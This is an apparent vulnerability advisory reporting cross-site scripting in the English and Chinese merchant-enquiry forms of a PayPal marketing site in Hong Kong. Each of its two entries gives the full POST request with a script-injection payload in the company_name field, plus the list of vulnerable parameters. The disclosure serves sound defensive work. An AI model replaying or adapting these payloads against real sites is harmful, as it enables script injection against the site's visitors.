Number of Vulnerabilities : 2
___________________________________________________________________________________________
--- Vulnerability # No- 1:
___________________________________________________________________________________________
+URL: https://www.paypal-marketing.com.hk/merchant-enquiries/index.php
+Vulnerability Type: Cross Site Scripting (XSS)
+ Form Action : POST
+POST Data Sent to Produce the Bug :
token=1359557986&from_page=en&company_name=%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E&business_type_other=vulnerable_field&business_need_other=vulnerable_field&contact_person=vulnerable_field&contact_person2=vulnerable_field&phone=vulnerable_field&phone2=vulnerable_field&email=vulnerable_field&email2=vulnerable_field&business_type=1
--Here, the field name with field value vulnerable_field are all vulnerable to cross site scripting .
And, the filed name (company_name) with value %22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E is also vulnerable and used here to produce the XSS bug here .
+POST Parameters that cause XSS Vulnerability in this Page :
company_name , business_type_other,business_need_other, contact_person ,contact_person2, phone,phone2, email,email2
+How to fix :
-- Though this page uses a java script function to validate this form, but it fails to sanitize the all characters which could allow hackers or pen testers to return malicious on webpage like Cross Site Scripting attack
___________________________________________________________________________________________
Vulnerability No. # 2 :
___________________________________________________________________________________________
+URL: https://www.paypal-marketing.com.hk/merchant-enquiries/index-zh.php
+Vulnerability Type: Cross Site Scripting (XSS)
+ Form Action : POST
+POST Data Sent to Produce the Bug :
token=1359557986&from_page=en&company_name=%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E&business_type_other=vulnerable_field&business_need_other=vulnerable_field&contact_person=vulnerable_field&contact_person2=vulnerable_field&phone=vulnerable_field&phone2=vulnerable_field&email=vulnerable_field&email2=vulnerable_field&business_type=1
--Here, the field name with field value vulnerable_field are all vulnerable to cross site scripting .
And, the filed name (company_name) with value %22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E is also vulnerable and used here to produce the XSS bug here .
+POST Parameters that cause XSS Vulnerability in this Page :
company_name , business_type_other,business_need_other, contact_person ,contact_person2, phone,phone2, email,email2
+How to fix :
-- Though this page uses a java script function to validate this form, but it fails to sanitize the all characters which could allow hackers or pen testers to return malicious on webpage like Cross Site Scripting attack
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information